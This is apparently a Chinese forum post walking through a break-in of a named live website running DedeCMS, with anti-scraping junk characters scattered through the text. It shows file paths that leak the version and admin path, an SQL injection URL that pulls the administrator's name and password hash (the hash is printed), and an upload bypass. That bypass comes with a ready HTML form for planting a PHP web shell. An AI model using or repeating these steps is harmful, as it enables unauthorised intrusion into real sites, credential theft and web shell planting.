①注入漏洞。; l2 D! _: |( a6 |. Q C6 ]) o
这站 http://www.political-security.com/
8 L7 a& Q) C1 @9 `# v/ \/ v& F首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,3 [2 O2 Y$ \3 Z: R* m7 n- Q. v! G
www.political-security.com/data/mysql_error_trace.inc 爆后台7 t, C1 T+ n, y4 n" g! A* Y, y
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
$ Z5 a0 ?1 H: k然后写上语句 . y. n* e3 r% O: i. r' m3 [
查看管理员帐号
; s: N1 I+ `: d6 m9 Vhttp://www.political-security.co ... &membergroup=@`) G0 D! K( n! y2 V6 A3 }- E0 t
5 [7 A4 m- d3 \4 [3 b3 s( g4 _! L
admin 0 L9 ~* O& e" G0 ^/ l
6 K) H1 |" G* b2 ~4 j1 r; l$ H/ S
查看管理员密码
+ ^ E+ c: g% \# \% q$ _ http://www.political-security.co ... &membergroup=@`
5 r: B4 O3 O( A$ c. e% o7 U1 D& f+ P+ C; T. [$ L
8d29b1ef9f8c5a5af429
! x9 e( W: U3 O u
& ~* G3 U# L; J* ~. x7 ~查看管理员密码- c9 f6 p# g9 F2 z) M
# Y4 K$ {$ W6 u2 f# U ^# R
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
( p+ D/ E5 h( u7 \ l) w6 v
8 {$ y' F" K' z8 U( p/ ~! H8d27 F; J- y/ j6 @. d( f
9b1ef9f8c5a5af425 H: J3 z" j$ ^; }2 H9 Q
9) l+ V+ M, _# w; `
+ \' x* O: N3 }9 i: zcmd5没解出来 只好测试第二个方法
$ d7 O, J# j( q& A5 O
2 m! K+ C A3 G4 B9 e) {# k& X
3 E, H# i$ `' M& N8 l9 M②上传漏洞:
4 Y X# h2 S. R6 g: `' T W
% I5 o, R1 m' B* R1 K: q只要登陆会员中心,然后访问页面链接
1 d# ~4 [0 j8 s8 ?- [“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
* `5 _/ H h: n& X7 U- r A: p( J, l! o, M6 V# I& G0 B/ n
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”9 @3 t% X3 f/ g: e7 V" I+ r. s
/ I7 [8 s6 W7 l, Y& x8 m& p于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
7 p$ a3 V! M3 H2 s8 x' d! {$ B [0 }2 y! D0 r* o
<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>0 T q& p* L: x; ?1 T3 \8 r( a
或者% n. Z, O. B4 P/ K- h
即可上传成功 |